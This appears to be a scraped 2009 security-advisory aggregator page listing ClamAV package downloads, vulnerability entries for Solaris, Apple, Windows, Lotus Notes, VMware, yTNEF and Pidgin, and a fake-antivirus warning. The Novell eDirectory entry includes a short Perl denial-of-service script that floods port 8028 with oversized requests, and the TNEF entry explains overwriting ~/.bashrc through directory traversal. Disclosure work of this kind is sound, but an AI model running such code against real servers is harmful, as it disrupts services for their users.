• Mandriva clamav-db-0.95.1-2.1mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-milter-0.95.1-2.1mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-2.1mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav-devel-0.95.1-2.1mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav6-0.95.1-2.1mdv2009.0.i586.rpm
  http://www.mandriva.com/en/download/

MandrakeSoft Corporate Server 4.0

• Mandriva clamav-0.95.1-1.1.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-1.1.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-milter-0.95.1-1.1.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-1.1.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav-devel-0.95.1-1.1.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav6-0.95.1-1.1.20060mlcs4.i586.rpm
  http://www.mandriva.com/en/download/

Clam Anti-Virus ClamAV 0.91

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.92

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.51

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.52

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.53

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.54

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.60

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.65

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.67

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.68

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.68 -1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.70

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.75.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.80 rc4

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.80

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.80 rc3

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.80 rc1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.80 rc2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.81

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.82

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.83

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.84

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.84 rc2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.84 rc1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.85

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.85.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.86 .1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.86

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.86.2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.87

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.87 -1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.87.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

ifenslave ifenslave 0.88

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.88.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.88.2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.88.3

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.88.4

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.88.5

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.90

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.90.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.90.2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.90.3

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.91.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.91.2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.92.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.93.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.93.3

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.94.1

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

Clam Anti-Virus ClamAV 0.94.2

• Clam Anti-Virus ClamAV-0.95.1.tar.gz
  http://freshmeat.net/urls/c9bfa0aa2a4b8f3dc21e37debf0b05e5

MandrakeSoft Corporate Server 3.0

• Mandriva clamav-0.95.1-1.1.C30mdk.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-1.1.C30mdk.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-1.1.C30mdk.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav-devel-0.95.1-1.1.C30mdk.i586.rpm
  http://www.mandriva.com/en/download/
• Mandriva libclamav6-0.95.1-1.1.C30mdk.i586.rpm
  http://www.mandriva.com/en/download/

MandrakeSoft Corporate Server 3.0 x86_64

• Mandriva clamav-0.95.1-1.1.C30mdk.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-1.1.C30mdk.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-1.1.C30mdk.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav-devel-0.95.1-1.1.C30mdk.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav6-0.95.1-1.1.C30mdk.x86_64.rpm
  http://www.mandriva.com/en/download/

MandrakeSoft Corporate Server 4.0 x86_64

• Mandriva clamav-0.95.1-1.1.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-db-0.95.1-1.1.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamav-milter-0.95.1-1.1.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva clamd-0.95.1-1.1.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav-devel-0.95.1-1.1.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/
• Mandriva lib64clamav6-0.95.1-1.1.20060mlcs4.x86_64.rpm
  http://www.mandriva.com/en/download/

Bookmark It




Hide Sites

Remote: No Local: Yes Published: Sep 09 2009 12:00AM Updated: Sep 10 2009 05:21PM Credit: Sun Vulnerable: Sun Solaris 10_x86
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_98
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_94
Sun OpenSolaris build snv_93
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_81
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_58
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_54
Sun OpenSolaris build snv_51
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_49
Sun OpenSolaris build snv_117
Sun OpenSolaris build snv_116
Sun OpenSolaris build snv_115
Sun OpenSolaris build snv_114
Sun OpenSolaris build snv_113
Sun OpenSolaris build snv_112
Sun OpenSolaris build snv_111a
Sun OpenSolaris build snv_111
Sun OpenSolaris build snv_110
Sun OpenSolaris build snv_109
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100 Not Vulnerable: Sun OpenSolaris build snv_118

Solution:
Vendor updates are available.

Bookmark It




Hide Sites

CVE: CVE-2009-2796 Remote: No Local: Yes Published: Sep 09 2009 12:00AM Updated: Sep 10 2009 04:21PM Credit: Abraham Vegh Vulnerable: Apple iPod Touch 2.2.1
Apple iPod Touch 2.0.2
Apple iPod Touch 2.0.1
Apple iPod Touch 1.1.4
Apple iPod Touch 1.1.3
Apple iPod Touch 1.1.2
Apple iPod Touch 1.1.1
Apple iPod Touch 3.0
Apple iPod Touch 2.2
Apple iPod Touch 2.1
Apple iPod Touch 2.0
Apple iPod Touch 1.1
Apple iPod Touch 0
Apple iPhone 3.0.1
Apple iPhone 2.2.1
Apple iPhone 2.0.2
Apple iPhone 2.0.1
Apple iPhone 1.1.4
Apple iPhone 1.1.3
Apple iPhone 1.1.2
Apple iPhone 1.1.1
Apple iPhone 1.0.2
Apple iPhone 1.0.1
Apple iPhone 3.0
Apple iPhone 2.2
Apple iPhone 2.1
Apple iPhone 2.0
Apple iPhone 1.1
Apple iPhone 1
Apple iPhone 0 Not Vulnerable: Apple iPod Touch 3.1.1
Apple iPhone 3.1 Bookmark It




Hide Sites

IBM Lotus Notes 8.5 RSS Widget Privilege Escalation

scip AG Vulnerability ID 4021 (09/08/2009)
http://www.scip.ch/?vuldb.4021

I. INTRODUCTION

Lotus Notes is a client-server, collaborative application developed and
sold by IBM Software Group.

More information is available on the official product web site at the
following URL:

http://www.ibm.com/software/lotus/products/notes/

II. DESCRIPTION

Marc Ruef at scip AG found a design vulnerability in the current Release
8.5.

The product provides some widgets which can be added and enabled by the
user. One of those widgets provide a simple RSS reader.

This reader downloads the RSS file, extracts the items and saves them
locally as HTML files.

The interpretation and display of the RSS items is handled by the
Internet Explorer regarding the applied security zone.

III. EXPLOITATION

No exploitation is required. A malicious RSS feed may contain script
data or embedded objects.

IV. IMPACT

The RSS items are handled like web documents which introduces the
possibility of running script code or to embed multimedia objects (e.g.
Flash or movies).

Because locally saved files run in the Local Zone of the Internet
Explorer some privilege escalation is possible.

V. DETECTION

It may be possible to identify malicious RSS feeds if they contain
script code or embedded objects.

VI. SOLUTION

IBM has been informed immediately. They are able to address this
vulnerability with a hotfix.

VII. VENDOR RESPONSE

The vendor verified the existence of the issue and addressed it as soon
as possible with a hotfix. Unfortunately most of the communication
bypassed us and were forced to ask for the current status several times.
Our last request of the current status at 08/24/2009 were unanswered.

VIII. SOURCES

scip AG – Security Consulting Information Process (german)
http://www.scip.ch/

scip AG – Vulnerability Database (german)
http://www.scip.ch/?vuldb.4021

computec.ch Document Database (german)
http://www.computec.ch/download.php

IX. DISCLOSURE TIMELINE

2009/04/07 Identification of the vulnerability.
2009/04/23 Notification of IBM via the customer.
2009/04/23 Technical knowhow exchange between scip AG/IBM.
2009/06/05 Asking for current status by scip AG. (no answer)
2009/07/09 Asking for current status by scip AG.
2009/07/09 Reply with current status and assigned PMR.
2009/08/24 Asking for current status by scip AG. (no answer)
2009/09/08 Public disclosure of the advisory.

X. CREDITS

The vulnerabilities were discovered by Marc Ruef.

Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch

A1. LEGAL NOTICES

Copyright (c) 2002-2009 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.

Bookmark It




Hide Sites

Affected Software:

Novell eDirectory 8.8 SP5

Vulnerability Description:

Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.

If a remote attacker sends Unicode strings with Http Request to “8028 port”

(”8028″ is the default port of Novell eDirectory Dhost Http Server),

the attacker can cause the system to consume 100% of the CPU resources.

Credits to:

Hellcode Research

Original Advisory:

http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

- snip-

….

$data = “?” x 500000;

for($i= 0; $i < 1000; $i++)

{

$sock= new IO::Socket::INET( PeerAddr => “localhost”,

PeerPort => 8028,

Proto => ‘tcp’,

Type => SOCK_STREAM,

);

print $sock “GET /$data HTTP/1.0\r\n\r\n”;

close($sock);

}

…

- snip -

Bookmark It




Hide Sites

The VMware movie decoder contains the VMnc media codec that is required to play back movies recorded with VMware Workstation, VMware Player and VMware ACE, in any compatible media player. The movie decoder is installed as part of VMware Workstation, VMware Player and VMware ACE, or can be downloaded as a stand alone package.

Several vulnerabilities in the VMnc codec can be exploited to cause heap-based buffer overflows via specially crafted video files containing incorrect framebuffer parameters.

Credit:
The information has been provided by Alin Rad Pop and Will Dormann.

Vulnerable Systems:
* VMware Workstation Movie Decoder version 6.5.2 and prior
* VMware Workstation version 6.5.2 and prior
* VMware Player version 2.5.2 and prior
* VMware ACE version 2.5.2 and prior

Immune Systems:
* VMware Workstation Movie Decoder version 6.5.3
* VMware Workstation version 6.5.3
* VMware Player version 2.5.3
* VMware ACE version 2.5.3

Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file.

VMware Workstation Movie Decoder stand alone

http://www.vmware.com/download/ws/drivers_tools.html

http://download3.vmware.com/software/wkst/VMware-moviedecoder-6.5.3-185404.exe
md5sum: 2e9de20045c44bc1c03daa3e6fd9a611
sha1sum: 9cd8f9578223310db988131885ffda6c9a4de873

VMware Workstation 6.5.3

http://www.vmware.com/download/ws/
Release notes:
http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html

For Windows

Workstation for Windows 32-bit and 64-bit
Windows 32-bit and 64-bit .exe
md5sum: 7565d16b7d7e0173b90c3b76ca4656bc
sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1

For Linux

Workstation for Linux 32-bit
Linux 32-bit .rpm
md5sum: 4d55c491bd008ded0ea19f373d1d1fd4
sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e

Workstation for Linux 32-bit
Linux 32-bit .bundle
md5sum: d4a721c1918c0e8a87c6fa4bad49ad35
sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5

Workstation for Linux 64-bit
Linux 64-bit .rpm
md5sum: 72adfdb03de4959f044fcb983412ae7c
sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb

Workstation for Linux 64-bit
Linux 64-bit .bundle
md5sum: 83e1f0c94d6974286256c4d3b559e854
sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542

VMware Player 2.5.3

http://www.vmware.com/download/player/
Release notes:
http://www.vmware.com/support/player25/doc/releasenotes_player253.html

Player for Windows binary

http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe
md5sum: fe28f193374c9457752ee16cd6cad4e7
sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04

Player for Linux (.rpm)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm
md5sum: c99cd65f19fdfc7651bcb7f328b73bc2
sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e

Player for Linux (.bundle)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle
md5sum: 210f4cb5615bd3b2171bc054b9b2bac5
sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b

Player for Linux – 64-bit (.rpm)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm
md5sum: f91576ef90b322d83225117ae9335968
sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974

Player for Linux – 64-bit (.bundle)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle
md5sum: 595d44d7945c129b1aeb679d2f001b05
sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4

VMware ACE 2.5.3

http://www.vmware.com/download/ace/
Release notes:
http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html

ACE Management Server Virtual Appliance
AMS Virtual Appliance .zip
md5sum: 44cc7b86353047f02cf6ea0653e38418
sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1

VMware ACE for Windows 32-bit and 64-bit
Windows 32-bit and 64-bit .exe
md5sum: 0779da73408c5e649e0fd1c62d23820f
sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef

ACE Management Server for Windows
Windows .exe
md5sum: 0779da73408c5e649e0fd1c62d23820f
sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef

ACE Management Server for SUSE Enterprise Linux 9
SLES 9 .rpm
md5sum: a4fc92d7197f0d569361cdf4b8cca642
sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75

ACE Management Server for Red Hat Enterprise Linux 4
RHEL 4 .rpm
md5sum: 841005151338c8b954f08d035815fd58
sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e

CVE Information:
CVE-2009-0199
CVE-2009-2628

Bookmark It




Hide Sites

Transport Neutral Encapsulation Format (TNEF) is a proprietary e-mail attachment format used by Microsoft Outlook and Microsoft Exchange Server. A plugin for Evolution exists that provides basic support for TNEF encoded e-mails. This plugin uses the ytnef library (libytnef) for processing TNEF messages. It borrows code from the ytnef program, which is a program to work with procmail to decode TNEF streams (winmail.dat attachments). These applications share code and are, because of this, both affected by the issues described in this document. yTNEF & the Evolution TNEF Attachment decoder plugin are affected by several directory traversal and buffer overflow vulnerabilities. The directory traversal vulnerabilities allow attackers to overwrite or create local files with the privileges of the target user. Exploiting the buffer overflow vulnerabilities allows for arbitrary code execution with the privileges of the target user. Credit:
The information has been provided by Yorick Koster.
The original article can be found at: http://www.akitasecurity.nl/advisory.php?id=AK20090601

Vulnerable Systems:
* Evolution TNEF version 2.62.2
* yTNEFversion 2.6

The following functions are affected by these issues: Evolution plugin:
* processTnef()
* saveVCard()
* saveVCalendar()
* saveVTask()

yTNEF:
* ProcessTNEF()
* SaveVCard()
* SaveVCalendar()
* SaveVTask()

Evolution TNEF Attachment decoder plugin

The plugin is started on e-mail attachments that have a MIME type of either application/vnd.ms-tnef or application/ms-tnef. It creates a temporary directory under ~/.evolution/cache/tmp using the format tnef-attachment-XXXXXX. The TNEF attachment is saved as .evo-attachment.tnef.

The saved file is parsed by TNEFParseFile(), the result is stored in a struct of the type TNEFStruct. This struct is passed to the function processTnef(), which tries to extract all relevant data and attachments from the TNEF stream. Each relevant part of the TNEF stream is stored within the previously created temporary directory that are made available to the end user as separate e-mail attachments.

yTNEF

yTNEF processes TNEF files in a similar manner. It receives a file name from the command line, calls TNEFParseFile() that creates a struct TNEFStruct after which ProcessTNEF() is called. If ProcessTNEF() finds attachments it can process, these attachments will be saved locally. The ProcessTNEF() function is almost the same as the processTnef() function of the Evolution plugin.

Directory Traversal

If a TNEF file is processed, both yTNEF and the Evolution plugin will save certain types of TNEF structures. Special processing functions are available for Contacts, Tasks & Appointments. These functions are called if the Message Class is set to a certain value.

There is also code that treats TNEF structures with the Message Class set to IPM.Microsoft Mail.Note. In the Evolution plugin, this code is never called as the global variable saveRTF is set to zero. In case of yTNEF this global variable is controlled by the command line.

After the structures mentioned before have been processed, all other attachments are also saved locally. The file names used to save the attachments are obtained from the TNEF data. In case of normal attachments, the code first looks if the TNEF data contains MAPI properties and if so, it will look for specific properties. If these exists, a file name is extracted from these properties. If the properties do not exist, the attachment’s title is used. This title is also set through a TNEF structure. If this title is also not available, a default file name will be used instead.

Before a new file is created, all spaces within the file name are replaced with the underscore character. No additional sanitation is performed on the file name. Because of this, it is possible to traverse outside of the temporary directory and create or overwrite any file with the privileges of the target user. This allows an attacker to execute arbitrary code for example by overwriting ~/.bashrc.

Buffer Overflow

eside the directory traversal, it is also possible to trigger a buffer overflow by supplying an overly long file name. This is possible, because the file name is copied in a fixed size buffer (256 bytes). In the Evolution plugin, this triggers a buffer overflow on the heap. In case of yTNEF the file name is copied in a buffer on the stack, thus allowing for a stack-based buffer overflow to occur.

Bookmark It




Hide Sites

Remote: Yes Local: No Published: Sep 07 2009 12:00AM Updated: Sep 08 2009 02:11PM Credit: Laurent Gaffié Vulnerable: Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta Bookmark It




Hide Sites

Beware of Googling (or indeed Yahooing or Binging or using any other internet search engine) for information about something called “Facebook Fan Check Virus”, as you’re likely to end up on a website hosting malicious code.

The phrase “Facebook Fan Check Virus” is currently a hot trending topic on Google, with many net users searching for information.

However, hackers have set up websites pretending to be about the “Facebook Fan Check Virus”, but which really host fake anti-virus software which display bogus warnings about the security of your computer in an attempt to get you to install fraudulent software and cough-up your credit card details.

Bookmark It




Hide Sites

CVE: CVE-2009-1924 Remote: Yes Local: No Published: Aug 11 2009 12:00AM Updated: Sep 07 2009 03:41PM Credit: LiGen of National University of Defense Technology Vulnerable: Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4 Bookmark It




Hide Sites

Remote: Yes Local: No Published: Aug 01 2009 12:00AM Updated: Sep 07 2009 03:21PM Credit: LiquidWorm Vulnerable: Google Sketchup 7.0.10247

Google SketchUp is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may exploit this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Google SketchUp 7.0.10247 is vulnerable; other versions may also be affected.

Solution:
Currently we are not aware of any vendor-supplied patches.

Bookmark It




Hide Sites

CVE: CVE-2009-2703 Remote: Yes Local: No Published: Sep 03 2009 12:00AM Updated: Sep 07 2009 09:01AM Credit: Florob, Waqas, Paul Aurich, Marcus Lundblad, aly89, Elliott Sales de Andrade, and blackstar. Cristofaro Mune discovered CVE-2009-2703. Vulnerable: Pidgin Libpurple 2.6.1
Pidgin Libpurple 2.6
Pidgin Libpurple 2.5.2

Pidgin Libpurple is prone to multiple denial-of-service vulnerabilities.

Successful exploits will crash the application, denying service to legitimate users.

Pidgin Libpurple versions 2.6.1 and prior are affected.

Bookmark It




Hide Sites